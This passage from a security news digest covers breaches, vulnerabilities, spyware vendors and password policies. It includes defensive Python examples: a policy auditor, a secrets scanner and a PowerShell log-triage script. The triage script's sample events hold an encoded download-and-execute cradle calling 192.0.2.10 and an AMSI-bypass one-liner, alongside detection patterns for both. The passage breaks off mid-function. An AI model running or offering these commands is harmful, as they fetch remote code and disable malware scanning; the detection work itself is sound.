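    A role like this on an EC2 instance turns one leaked credential into a
    bulk download of every bucket the account owns.
    """
    findings = []
    for st in _as_list(identity_policy.get("Statement", [])):
        actions = {a.lower() for a in _as_list(st.get("Action", []))}
        resources = set(_as_list(st.get("Resource", [])))
        if (st.get("Effect") == "Allow" and actions & {"*", "s3:*"}
                and "*" in resources):
            findings.append(st.get("Sid", "<no Sid>"))
    return findings


# Constructed sample: one public-read statement, one wildcard principal
# correctly scoped to an organization, one ordinary role grant.
SAMPLE_BUCKET_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"]},
    {"Sid": "OrgOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*",
     "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-exampleorgid"}}},
    {"Sid": "AppRole", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111122223333:role/app"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}
  ]
}""")

# Constructed sample: an instance role that is far broader than the app needs.
SAMPLE_ROLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ReadOwnConfig", "Effect": "Allow",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::app-config/*"},
        {"Sid": "Everything", "Effect": "Allow", "Action": "s3:*", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    print("public bucket statements:", public_statements(SAMPLE_BUCKET_POLICY))
    print("over-broad role statements:", overbroad_iam_statements(SAMPLE_ROLE_POLICY))
```

Running this against real exports is a matter of feeding `json.load()` output from each account into the two functions; the point is that both findings are visible from configuration alone, before any attacker needs to scan for them.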
WordPress Ninja Forms Vulnerability Fixed
A critical code injection vulnerability in the Ninja Forms WordPress plug-in can be exploited to execute arbitrary code or delete arbitrary files. The plug-in has more than one million active installations. The flaw has been fixed in Ninja Forms 3.6.11, and the fix has been backported to the plug-in’s other supported 3.x release branches (including 3.1.10 and 3.2.28).
- Do not patch this plugin. Uninstall it, and while you are at it either uninstall as many of these plugins as you can or move your WordPress site to a hosted/managed solution.
- (This is me, not repeating my usual caution about WordPress plugins.)
Read more in
- WordPress Plug-in Ninja Forms Issues Update for Critical Bug
- PSA: Critical Vulnerability Patched in Ninja Forms WordPress Plugin
Flagstar Bank Discloses Data Breach
Michigan-based Flagstar Bank has disclosed that a cyberattack against its network led to the compromise of personal information belonging to 1.5 million of its customers. Flagstar’s corporate network was breached in December 2021; the bank learned that customer data were exposed on June 2, 2022. Flagstar experienced a previous cyberattack; it was the victim of ransomware in January 2021.
- This is a very good cautionary tale to use with your management: in January 2021, Flagstar had a vulnerable Accellion server get exploited in a ransomware attack, customer information was exposed and Flagstar “…engaged a team of third-party forensic experts to investigate and determine the full scope of this incident.” Any expert engagement should have included recommendations to deal with overall security gaps, not just the Accellion issue. If that was acted on, Flagstar should have at least been much faster to detect this latest compromise – they state the attackers had 4-6 months on target (Date(s) Breach Occurred: 12/03-04/2021, Date Breach Discovered: 06/02/2022) – that is a bad metric for a small business, unacceptable for a bank as large as Flagstar that had over $500M in profits in 2021. Cost to avoid the second breach would have been a small fraction of that profit and likely would have been less than the direct costs Flagstar will see from this latest incident.
Proposed Legislation in US Senate Would Ban Sale of Health and Location Data
A bill introduced in the US Senate would prohibit data miners from selling location and health data. The Health and Location Data Protection Act would also require the Federal Trade Commission (FTC) to establish rules for implementing the law within 180 days of the bill’s passage.
- The real news here is that the sale of health and location data is a business in the first place. There are many legitimate reasons why applications collect health and location data, but selling the data shouldn’t be one of them.
- Even politically neutral national data privacy legislation almost never gets passed by US legislators. The broader data privacy legislation that has been proposed should cover Personal Health Information, vs. have individual data types of privacy-sensitive information have different laws.
Read more in
- Ban on sale of health data by brokers introduced in Senate ahead of abortion ruling
- Abortion rights: US senators seek ban on sale of health location data
International Effort Disrupts Russian Botnet
The US Department of Justice (DoJ) and law enforcement agencies in the Netherlands, Germany, and the UK, have dismantled the infrastructure of a Russian botnet. The botnet, known as RSOCKS, comprised millions of devices around the world, including Internet of Things (IoT) devices, Android devices, and other computers. The botnet was operating as a proxy service, but was offering IP addresses from devices it had compromised rather than legitimately obtained IP addresses.
Read more in
- US disrupts Russian botnet that ‘hacked millions of devices’
- Feds Take Down Russian ‘RSOCKS’ Botnet
- DOJ seizes proxy service as US, partners hit Russian hackers
- Russian Botnet Disrupted in International Cyber Operation
Rapid7 Report: Types of Data Most Often Targeted by Ransomware Operators
According to a report from Rapid7, ransomware operators seem to prefer certain types of data over others. According to the report, financial sector organizations are more likely to experience ransomware attacks than organizations in other sectors. Ransomware operators target sensitive customer data, employees’ personally identifiable information (PII), and human resources data.
- Since protecting all data to the same level is either ineffective or inefficient, this information can be useful.
Read more in
- Ransomware attacks: This is the data that cyber criminals really want to steal
- New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers
BRATA Malware Gains New Features
The BRATA banking trojan has recently added several new features to its capabilities. Analysts from Italian security company Cleafy have detected changes in the ways BRATA, which is an acronym for Brazilian Remote Access Tool Android, conducts its attacks. According to Cleafy, “the [malware’s] modus operandi now fits into an Advanced Persistent Threat (APT) activity pattern.” BRATA threat actors have begun to launch more narrowly targeted attacks, focusing on one financial institution at a time. It also uses new methods of obtaining permissions to access location data, and to send and receive SMS.
Read more in
- BRATA is evolving into an Advanced Persistent Threat
- Android-wiping BRATA malware is evolving into a persistent threat
- BRATA Android Malware Gains Advanced Mobile Threat Capabilities
- This phone-wiping Android banking trojan is getting nastier
Vulnerability in Cisco Small Business Routers
Cisco will not release updates to address a flaw affecting several models of its small business routers because the devices “have entered the end-of-life process.” The vulnerability could be exploited to allow remote code execution or to create denial-of-service conditions. According to a Cisco security advisory, the “vulnerability is due to insufficient user input validation of incoming HTTP packets.” Users are urged to migrate to newer routers.
- One can usually replace these routers for less than the cost of the time to repair, were a patch even available.
Read more in
- Cisco says it won’t fix zero-day RCE in end-of-life VPN routers
- Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Remote Command Execution and Denial of Service Vulnerability
Siemens Fixes Flaws in SINEC Network Management System
Researchers from Claroty’s Team82 found more than a dozen vulnerabilities in Siemens’ SINEC network management system (NMS). The flaws leave vulnerable systems open to denial-of-service attacks, credential leaks, and remote code execution. Siemens released an update that addresses the vulnerabilities in October 2021.
Read more in
- SSA-163251: Multiple Vulnerabilities in SINEC NMS (PDF)
- Securing Network Management Systems (Part 3): Siemens SINEC NMS
- Over a Dozen Flaws Found in Siemens’ Industrial Network Management System
Google TAG says it tracks 30 surveillance vendors
There are three tech companies today that have a unique and comprehensive view of people’s online lives. These are Apple, Google, and Microsoft, all of which are behind today’s top operating systems, as well as some of the Internet’s most popular online services.
For Google, the signals it acquires from Gmail, Drive, Chrome, and Android give the company remarkable insight into today’s threat landscape. For example, Google can see what types of threats are hitting Android devices and Gmail inboxes, even when those threats target other operating systems into which Google has far less visibility.
Over the years, Google has dedicated significant efforts and funds to boosting its security teams to take advantage of this unique position, and, once in a while, the company makes a statement that reveals the scope of a particular problem or topic.
One of those days was yesterday. In a blog post on Thursday, the Google Threat Analysis Group (TAG), the Google security team that tracks advanced threats, revealed that they are aware of and currently tracking more than 30 organizations selling surveillance capabilities to government-backed threat actors.
This quite large number highlights that while the public’s attention has been captured by a few vendors like Hacking Team, Gamma Group, NSO Group, and Candiru, there are far more entities that engage in similar operations in an industry that has been loosely regulated over the past decade.
The latest Google TAG report adds new information about RCS Lab, an Italian company that used to be a reseller for the old HackingTeam, but has now moved into creating and selling its own tools.
The company was at the center of a first report last week, when mobile security firm Lookout published an analysis of Hermit, a piece of Android malware packed with multiple exploits, which Lookout said it initially found being deployed in Kazakhstan in April this year. Further sleuthing found the same malware deployed in Syria, and in Italy in both 2019 and 2021 as part of law enforcement anti-corruption investigations, according to documents released by the Italian government.
Google TAG’s report effectively confirms Lookout’s findings and adds more depth, especially on Hermit’s use inside Italy, where Google said the entity that deployed the malware appears to have worked with local ISPs to disable the target’s mobile data connection before sending an SMS telling the victim to install an ISP-themed mobile app to restore it.
Furthermore, Google also confirmed that RCS Lab has iOS exploits in its arsenal, namely CVE-2021-30983 (aka Clicked3), which Google’s Project Zero team analyzed in a separate blog post and which Apple patched last December. This was just one of the six iOS exploits RCS Lab had packed into its malicious iOS app.
Now, Google says that while everyone has been fixated on taking down NSO Group, other vendors have been slowly growing in the Israeli company’s shadow.
“[T]he commercial spyware industry is thriving and growing at a significant rate,” Google TAG’s Benoit Sevens and Clement Lecigne said. “This trend should be concerning to all Internet users.”
These vendors are enabling the proliferation of dangerous hacking tools and arming governments that would not be able to develop these capabilities in-house. While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians.
Aside from these concerns, there are other reasons why this industry presents a risk to the Internet. While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret poses a severe risk to the Internet especially if the vendor gets compromised. This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.
Carnival Cruise settlement
US cruise line Carnival Cruise has agreed to pay $1.25 million in a multi-state settlement over its 2019 data breach. The money will be divided between 46 states and residents impacted by the incident. Read more:
- Idaho Joins $1.25 Million Settlement over 2019 Carnival Cruise Data Breach
- Connecticut Co-Leads $1.25 Million Multistate Settlement Over 2019 Carnival Cruise Line Data Breach
- AG SHAPIRO SECURES SETTLEMENT OVER CARNIVAL CRUISE DATA BREACH
- 1.25 million for consumers affected by Carnival Cruise Line’s data breach
CS:GO skin heist
A hacker has stolen more than $2 million worth of Counter-Strike: Global Offensive skins from a collector’s private Steam inventory, including seven rare and highly-prized AWP Dragon Lore skins, considered some of the most expensive skins that CS:GO players can own. The hack is currently considered the largest theft in the game’s history. Read more: Hacker steals $2 million in CS:GO skins
New Instagram feature
Meta announced on Thursday that they are testing a new way for users to verify their age on the platform. “If someone attempts to edit their date of birth on Instagram from under the age of 18 to 18 or over, we’ll require them to verify their age using one of three options: upload their ID, record a video selfie or ask mutual friends to verify their age,” the company said. Read more: Introducing New Ways to Verify Age on Instagram
Chrome 103 is out
Google has released v103 of its Chrome web browser this week. Alongside the usual security fixes and dev/API-related changes, this release also brought a number of new features to Chrome for iOS. The most important is that Google’s Enhanced Safe Browsing is now available to iPhone users, after being available to Chrome users on other platforms since last year.
7-Zip now supports MotW
7-Zip v22, released last week, supports Mark-of-the-Web, a Windows security feature that security firms and antivirus makers had long requested. 7-Zip becomes the fifth major file archiver on Windows to support it, after WinRAR, WinZip, Explzh, and Bandizip. Note that the feature is disabled by default in 7-Zip and has to be enabled in the program’s options before extracted files carry the mark. Read more: 7-zip now supports Windows ‘Mark-of-the-Web’ security feature
NSA and allies on PowerShell
Cybersecurity authorities from the US, the UK, and New Zealand have released a joint security advisory on the proper configuration and monitoring of PowerShell on Windows systems. A surprise to many, the three agencies didn’t universally recommend removing or disabling PowerShell entirely, as there are benefits to having it enabled on a local network. The US NSA, the UK NCSC, and the NZ GCSB said that their recommendations “will help defenders detect and prevent abuse by malicious cyber actors, while enabling legitimate use by administrators and defenders.” Read more: NSA, Partners Recommend Properly Configuring, Monitoring PowerShell in New Report
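What “monitoring PowerShell” looks like in practice, as an added example rather than anything taken from the advisory: Script Block Logging, one of the settings the advisory recommends enabling, records the de-obfuscated text of each script block PowerShell runs as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. The script below triages already-exported ScriptBlockText values, decodes `-EncodedCommand` payloads (base64 of UTF-16LE text) and flags common abuse patterns. The event field names, the indicator list and the sample events are constructed for this example and are not the EVTX schema or any vendor’s rule set.

```python
"""Triage PowerShell Script Block Logging events (Event ID 4104).

Added example; this is not code from the NSA/NCSC/GCSB advisory. It works
on exported ScriptBlockText values, decodes -EncodedCommand payloads and
flags common abuse patterns. Field names and sample events are constructed.
"""
import base64
import re

# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -ec,
# -en, -enc, ...). -ErrorAction / -ExecutionPolicy do not match because
# the "-e" is not followed by c, n or whitespace.
ENCODED_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (name, regex) pairs. These are indicators for an analyst, not verdicts.
INDICATORS = [
    ("download-cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    ("in-memory-exec", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("reflection", re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I)),
    ("amsi-tamper", re.compile(r"AmsiUtils|amsiInitFailed", re.I)),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("bypass-policy", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
]


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    powershell.exe expects the argument to be base64 of the UTF-16LE script.
    """
    match = ENCODED_RE.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Return the decoded payload and the indicators matched for one 4104 event."""
    text = event["ScriptBlockText"]
    decoded = decode_encoded_command(text)
    if decoded is None:
        haystack = text
    else:
        # Drop the base64 blob so its characters cannot trip the regexes,
        # then search the decoded script alongside the launcher command line.
        haystack = ENCODED_RE.sub(" ", text) + "\n" + decoded
    hits = [name for name, rx in INDICATORS if rx.search(haystack)]
    if decoded is not None:
        hits.insert(0, "encoded-command")
    return {"record_id": event["RecordId"], "decoded": decoded, "indicators": hits}


def suspicious_events(events):
    """Triage every event and keep those with at least one indicator."""
    return [result for result in map(triage, events) if result["indicators"]]


def encode_command(script):
    """Build a -EncodedCommand argument the way an attacker (or an admin) would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"

# Constructed sample events: a routine admin one-liner, an encoded download
# cradle launched with a hidden window, and an AMSI bypass attempt.
SAMPLE_EVENTS = [
    {"RecordId": 1001, "ScriptBlockText":
        "Get-Service | Where-Object Status -eq 'Stopped' | Export-Csv C:\\ops\\stopped.csv"},
    {"RecordId": 1002, "ScriptBlockText":
        "powershell.exe -nop -w hidden -enc " + encode_command(CRADLE)},
    {"RecordId": 1003, "ScriptBlockText":
        "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
]

if __name__ == "__main__":
    for result in suspicious_events(SAMPLE_EVENTS):
        print(result["record_id"], result["indicators"])
        if result["decoded"]:
            print("   decoded:", result["decoded"])
```

The routine `Get-Service` event produces no hits, which is the point of keeping PowerShell enabled and logged rather than banning it: the logs let you separate the administrator from the cradle, and without Script Block Logging the encoded launcher is all a defender would ever see.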
CISA wants a cybersecurity hotline
Members of the CISA Cybersecurity Advisory Committee proposed the creation of an emergency “311” cybersecurity call line for incidents affecting small and medium-sized businesses, The Record reported on Wednesday. The idea has received positive feedback and approval on social media, although there is a fear the hotline will turn into a tech support line if not implemented correctly. Details about how this will work are still unclear, though. Read more: CISA experts propose ‘311’ cybersecurity emergency call line for small businesses
Long CISA onboarding
The same CISA Cybersecurity Advisory Committee also recommended that the agency cut its onboarding process for new employees from the current 198 days to 90 days, Federal News Network reported. “The process is lengthy and difficult to navigate both internally and externally, and therefore places CISA at a tremendous disadvantage relative to private sector employers for this critical and highly sought-after talent pool,” the report [PDF] states. Read more: CISA advisors recommend agency cut onboarding time to 90 days
US spy agencies prepared to loosen hiring rules
US intelligence agencies will soon be given the green light to hire IT experts that have smoked or consumed marijuana products in the past, something that has been prohibited until now, the WSJ reported. The measure, approved unanimously by the Senate Intelligence Committee on Wednesday, comes as the CIA, NSA, and other cybersecurity agencies have been struggling to find IT talent as many are disqualified out of the blocks because they consumed marijuana in previous months or in previous stages of their life. As marijuana has become legal in 19 US states and the District of Columbia, this new loosened hiring policy was a long time coming, although active marijuana consumption during government employment is still prohibited. Read more: U.S. Spy Agencies Could Hire Former Marijuana Users Under Senate Bill
US bill on privacy and data transfers
A bipartisan group of US senators has proposed a new bill this week that would ban the sale or transfer of private information belonging to US citizens to foreign countries considered a national security risk, such as China or Russia. The new bill is named the Protecting Americans’ Data from Foreign Surveillance Act and was sponsored by Senator Ron Wyden (D-Ore), Senator Cynthia Lummis (R-Wyo), Senator Sheldon Whitehouse (D-RI), Senator Marco Rubio (R-Fla), and Senator Bill Hagerty (R-Tenn). Read more: Wyden, Lummis, Whitehouse, Rubio and Hagerty Introduce Bipartisan Legislation to Protect Americans’ Private Data from Hostile Foreign Governments
Lithuania DDoS alert
The Lithuanian National Cyber Security Center has issued an alert about an increase in DDoS attacks targeting local websites. According to the agency, most of the DDoS attacks are directed against public authorities, transport, and financial sectors, and the attacks have caused temporary disruptions to services. The attacks came as pro-Russian hacktivist groups announced plans to launch DDoS attacks against Lithuanian websites after the country said it wouldn’t allow trains carrying Russian sanctioned goods to pass through its territory to Russia’s Kaliningrad enclave. Read more: NKSC fiksuoja išaugusį paslaugų trikdymo kibernetinių atakų skaičių Lietuvoje
Conti infrastructure goes down
After news that the Conti gang was preparing to disband into smaller operations last month, Conti infrastructure has finally gone down for good, confirming earlier reporting.
Vulnerabilities used by ransomware gangs
Tenable has a report out on the ransomware ecosystem. The report includes a list of 78 vulnerabilities exploited by ransomware groups for their attacks. Read more: A LOOK INSIDE THE RANSOMWARE ECOSYSTEM
Broadcom’s Symantec team is reporting a rise in instances of Search Marquis, a browser hijacking malware strain that targets macOS users.
CISA and the US Coast Guard Cyber Command said in an advisory on Thursday that VMware Horizon and VMware Unified Access Gateway (UAG) are still being actively attacked using the old Log4Shell vulnerability disclosed last year. CISA said attacks had been spotted from cybercrime and state-backed groups alike. The warning also comes as Cisco Talos issued a similar warning earlier this week about the AvosLocker ransomware gang using Log4Shell to compromise VMware UAG systems. Read more: Avos ransomware group expands with new attack arsenal
Scalping bots hit Israeli government sites
In a report on Thursday, security firm Akamai said that it detected several scalping bots targeting MyVisit, the appointment scheduling platform used by many Israeli government offices. Akamai says that these bots have been filling government appointment slots at various agencies and then reselling the slots on the dark market for a profit, with some slots going as much as $100. Read more: Bots Are Scalping Israeli Government Services
Brian Krebs has published an exposé on the people running the RSocks rent-a-proxy service, seized by the FBI and US DOJ earlier this week. Read more: Meet the Administrators of the RSOCKS Proxy Botnet
Group-IB has a report on the activities of the Conti ransomware cartel based on their leaked chats. The research dives deep into the history and major milestones of one of the most aggressive and organized ransomware operations, which, according to Group-IB, has hit at least 850 organizations across the world. Read more: The Conti Enterprise: ransomware gang that published data belonging to 850 companies
Greek security researcher Anastasios Pingios has published an analysis of SUAVEEYEFUL, a CGI software implant for FreeBSD and Linux. The malware was developed by the Equation Group (believed to be the US NSA) and was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University in the early 2000s. The implant’s existence was revealed during the ShadowBrokers leak in 2017. The leaked version targeted MiraPoint email products specifically. Read more: The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP
Check Point has published a report on a Chinese APT, which they believe has possible ties to the Tropic Trooper (KeyBoy) threat actor. The CP report focuses on the group’s new malware strain, named Nimbda, a malware loader coded in the Nim programming language, as well as a new variant of the Yahoyah trojan, focused on collecting information about local wireless networks. Read more: Chinese actor takes aim, armed with Nim Language and Bizarro AES
Sekoia has a report out on Calisto—the Russian threat actor that Google TAG tracks as Cold River—and which has been targeting Western NGOs, think tanks, and the defense sector. Sekoia reports on this group’s use of Evilginx, a tool that allows it to set up reverse proxies on phishing pages to intercept authentication cookies and bypass 2FA. Read more:
- Exclusive: Russian hackers are linked to new Brexit leak website, Google says
- CALISTO continues its credential harvesting campaign
Russia’s cyber operations
Microsoft has published an updated version of its report [PDF] describing Russia’s cyber operations since its invasion of Ukraine. The report—an update to a previous version released in April—details destructive cyberattacks within Ukraine, network penetration and espionage outside Ukraine, and cyber influence operations targeting people around the world.
The MEGA file-sharing service has released fixes this week for a set of vulnerabilities that could have allowed a malicious or compromised MEGA server to decrypt customer files. The issues, named MEGA-awry, were discovered by academics from ETH Zurich and stem from the way MEGA’s clients wrap a user’s keys with AES-ECB and no integrity protection: the server can tamper with the encrypted key material and, over repeated logins, recover the user’s RSA private key, which in turn can be used to decrypt the keys protecting the user’s files. In a blog post on Wednesday, MEGA said it was not aware of any user accounts being compromised by this attack. Read more: MEGA Security Update
Cloud security firm Aqua Security has open-sourced a supply chain auditing tool named Chain-bench. Read more: Aqua Security Ships Open Source Tool for Auditing Software Supply Chain
Ukraine DDoS protection
Radware has announced that it will provide pro-bono DDoS mitigation services to the Ukrainian government. Read more: Ukraine’s State Service of Special Communications and Information Protection Selects Radware for Cloud and Application Security Services
Mandiant has released v2 of FLOSS, a tool the company’s analysts have used to deobfuscate strings found inside malware binaries.
Millions Of Secrets Exposed Via Web Application Frontend
They found ~1.2M secrets: Stripe, reCAPTCHA, Google Cloud, AWS, Google OAuth, Facebook, and more.
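As an added example of the kind of scan that finds these (not the study’s tooling): a pattern scanner over a front-end bundle that separates keys which must never be client-side (Stripe secret keys, AWS access key IDs, private key blocks) from identifiers that are public by design (Stripe publishable keys, Google OAuth client IDs) and from ones that are acceptable in a browser only when restricted by referrer or API scope (Google API keys). The key formats are the documented public ones; the sample bundle and every key value in it are constructed.

```python
"""Scan a web front-end bundle for credentials that should never reach a browser.

Added example, not the tooling used for the study the page links to. The
patterns cover well-documented key formats; the bundle text is constructed.
Some identifiers in client-side code are public by design (a Stripe
publishable key, a reCAPTCHA site key, a Google OAuth client ID), so each
match carries a severity instead of being treated as a leak outright.
"""
import re

# (finding type, severity, regex). "secret": must never be client-side.
# "review": meant to be embedded but must be restricted (referrer/API scope).
# "public": designed for the browser; inventoried, not alarmed on.
PATTERNS = [
    ("stripe-secret-key", "secret",
     re.compile(r"\bsk_(?:live|test)_[0-9a-zA-Z]{24,}\b")),
    ("stripe-publishable-key", "public",
     re.compile(r"\bpk_(?:live|test)_[0-9a-zA-Z]{24,}\b")),
    ("aws-access-key-id", "secret",
     re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("google-api-key", "review",
     re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b")),
    ("google-oauth-client-id", "public",
     re.compile(r"\b\d{12}-[0-9a-z]{32}\.apps\.googleusercontent\.com\b")),
    ("private-key-block", "secret",
     re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
]


def redact(value):
    """Keep enough of a match to identify it in a ticket without re-leaking it."""
    return value if len(value) <= 12 else value[:8] + "..." + value[-4:]


def scan_bundle(text, source="<bundle>"):
    """Return one finding per match, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, severity, rx in PATTERNS:
            for m in rx.finditer(line):
                findings.append({"source": source, "line": lineno, "type": name,
                                 "severity": severity, "match": redact(m.group(0))})
    return findings


def summarize(findings):
    """Count findings per severity; a non-zero 'secret' count should fail the build."""
    counts = {"secret": 0, "review": 0, "public": 0}
    for f in findings:
        counts[f["severity"]] += 1
    return counts


# Constructed sample bundle. Line 1 is fine; line 2 is the classic mistake of
# shipping the backend key next to the publishable one; lines 3-5 show the
# other formats. No value here is a real credential.
SAMPLE_BUNDLE = "\n".join([
    'const stripe = Stripe("pk_live_TESTpublishable0000000000000000");',
    'const backup = "sk_live_TESTsecretkey00000000000000000000";  // server-side only',
    'const s3 = new AWS.S3({accessKeyId: "AKIAIOSFODNN7EXAMPLE", secretAccessKey: "..."});',
    'const mapsKey = "AIzaSyA-EXAMPLE_KEY_' + "0" * 19 + '";',  # AIza + 35 chars
    'const gsiClient = "123456789012-abcdefghijklmnopqrstuvwxyz012345.apps.googleusercontent.com";',
])

if __name__ == "__main__":
    results = scan_bundle(SAMPLE_BUNDLE, "app.js")
    for f in results:
        print(f"{f['source']}:{f['line']} [{f['severity']}] {f['type']} {f['match']}")
    print(summarize(results))
```

Run it over the built bundle in CI and gate on `summarize()["secret"] == 0`; the “review” bucket is for a human to confirm the key’s restrictions, and the “public” bucket is just an inventory so a publishable key is not mistaken for a leak.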
US TikTok User Data Has Been Repeatedly Accessed From China, Leaked Audio Shows
In addition to the data accessed, what about being able to control the algorithm that influences what people see? What sort of influence could this have over Americans’ commercial, cultural, or political behavior? Much I imagine.
“I feel like with these tools, there’s some backdoor to access user data in almost all of them,” said an external auditor hired to help TikTok close off Chinese access to sensitive information, like Americans’ birthdays and phone numbers.
What It Means that the U.S. Is Conducting Offensive Cyber Operations Against Russia
Gen. Paul Nakasone’s remarks this month about offensive operations against Russia caused a stir. Kim Zetter goes into what that means. Read more: What It Means that the U.S. Is Conducting Offensive Cyber Operations Against Russia
Cisco patches critical, high-severity vulnerabilities in Email Security Appliance, home routers
Cisco published advisories for several significant vulnerabilities last week, including one in end-of-life routers that it will not fix. One critical vulnerability exists in the Email Security Appliance and in Secure Email and Web Manager. Any virtual or hardware appliance running a vulnerable version of AsyncOS is affected, and the flaw could allow attackers to bypass security protections on the device. There is also a fix for a high-severity issue in the same products that could allow an adversary to obtain information from an LDAP external authentication server connected to the vulnerable appliance. Another issue, CVE-2022-20825, could allow an unauthenticated attacker to execute code remotely on several models of Cisco’s RV series of routers; those devices have reached end-of-life and the vulnerability will not be patched. Read more: Cisco Patches Critical Vulnerability in Email Security Appliance
- web3rekt database launched keeping track of blockchain incidents and scams dating as far back as 2012.
- Cryptocurrency crime and anti-money laundering report by CipherTrace.
- Solana DeFi platform votes to control whale account via ’emergency powers’ in bid to avoid liquidation ‘chaos’.
- On June 13, 2022 FSwap lost $390K in a price manipulation attack taking advantage of its fee handling logic.
- On June 16, 2022 Inverse Finance lost $1.26M in a price oracle manipulation exploit. Interestingly, the exploit transaction would have been front-run had it not received a boost from an MEV bot.
- On June 18, 2022 Tether’s web infrastructure came under DDoS attack following an unsuccessful ransom demand.
- OpenSea patched a critical vulnerability which could allow theft of offered WETH from users’ wallets thanks to a responsible disclosure by Gus.
- OpenSea patched a vulnerability which could allow sellers to receive payments for Shared Storefront items they did not own. The vulnerability was responsibly disclosed by MevRefund.
- Phantom wallet and Metamask patched a vulnerability which could expose secret recovery phrase after it was responsibly disclosed by Halborn.
- MetaMask Clickjacking Vulnerability Analysis by SlowMist.
- Hertzbleed is a new family of side-channel attacks which may allow attackers to extract cryptographic keys from remote servers.
- Darknet Diaries – EP 119: Hot Wallets on the NiceHash hack by North Korea.
Top websites have sucky password policies
A team of academics from Princeton University analyzed the password policies of the 120 most popular English-language websites and found that, even after years of recommendations from security experts, the vast majority still have remarkably bad rules for the passwords users must create when opening an account.
The team, led by the well-known privacy researcher and Princeton professor Arvind Narayanan, focused on three of the most basic industry best practices for setting up a new password:
- Check user passwords against lists of leaked and easily-guessed passwords;
- Provide real-time password strength meters;
- Do not require specific character classes in the password’s make-up.
But while these sound like very simple requirements, they are not widely implemented. The research team said that only 15 of the 120 websites they analyzed followed these recommendations.
In fact, their findings are absolutely astounding(ly bad):
- More than half (71/120) of websites do not check passwords at all, allowing 40 of the most common passwords (e.g., “12345678”, “rockyou”) to be used as account credentials, with no warning to the user that they may be at risk of account hijacking.
- Only 23 of the 120 websites used password strength meters, and ten of these sites misused meters in the sense of nudging users toward specific types of characters.
- In addition, 54 out of the 120 websites still require specific character classes such as digits or special characters to be included in the password, a practice that has been shown to be counterproductive, as users tend to select simpler and easier-to-remember passwords as a result.
The research team gives Facebook as a good example of how many of these policies appear to be cobbled together with no actual thinking behind the process, and of how websites end up nudging users toward weaker passwords.
The researchers also looked at some of the reasons why, in 2022, so many popular websites still haven’t learned anything from the hacks from the last decade.
One of the reasons they put forward was that companies are shifting their attention to multi-factor authentication, and many websites may not care to strengthen their password policies. Another was related to auditors.
“Websites need to pass security audits, and the firms who do these audits, such as Deloitte, recommend or mandate outdated practices,” researchers said.
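The three practices the Princeton team measured, as an added example that is not the study’s own code or the newsletter’s: a registration-time check that rejects leaked passwords (and their trivial variants), scores strength by estimated guess count rather than by a character-class checklist, and imposes only a length floor. The common-password list and the sample inputs are constructed stand-ins.

```python
"""Added example (not from the Princeton study or the newsletter): a
registration-time password check that follows the three practices the
study measured. The common-password list and all sample inputs are
constructed stand-ins for a real breach corpus."""
import math
import re

MIN_LENGTH = 8  # a length floor is the only hard composition rule we impose

# Constructed stand-in for a breach/common-password list, ordered by
# frequency so the rank doubles as a rough "guesses needed" count.
COMMON_PASSWORDS = [
    "123456", "password", "12345678", "qwerty", "rockyou",
    "iloveyou", "princess", "letmein", "football", "dragon",
]
COMMON_RANK = {p: i + 1 for i, p in enumerate(COMMON_PASSWORDS)}

# Undo the usual "leet" substitutions so P@ssw0rd is treated as password.
LEET = str.maketrans("@01345$7", "aoieaast")


def split_word_digits(pw):
    """Lower-case, split off a trailing digit run, undo leet: ("password", "1")."""
    m = re.fullmatch(r"(.*?)(\d*)", pw.lower())
    return m.group(1).translate(LEET), m.group(2)


def leaked_rank(pw):
    """Practice 1: rank on the common list (1 = most common) for the password
    itself or a trivial variant (case change, leet, appended digits);
    None when it is not on the list."""
    full = pw.lower()
    if full in COMMON_RANK:
        return COMMON_RANK[full]
    word, _ = split_word_digits(pw)
    return COMMON_RANK.get(word)


def log2_guesses(pw):
    """Practice 2: strength as an estimated guess count (log2), not a
    class checklist. A listed password costs its rank; a listed word with
    N appended digits costs rank * 10**N; anything else is scored as
    brute force over the character set it actually uses."""
    if not pw:
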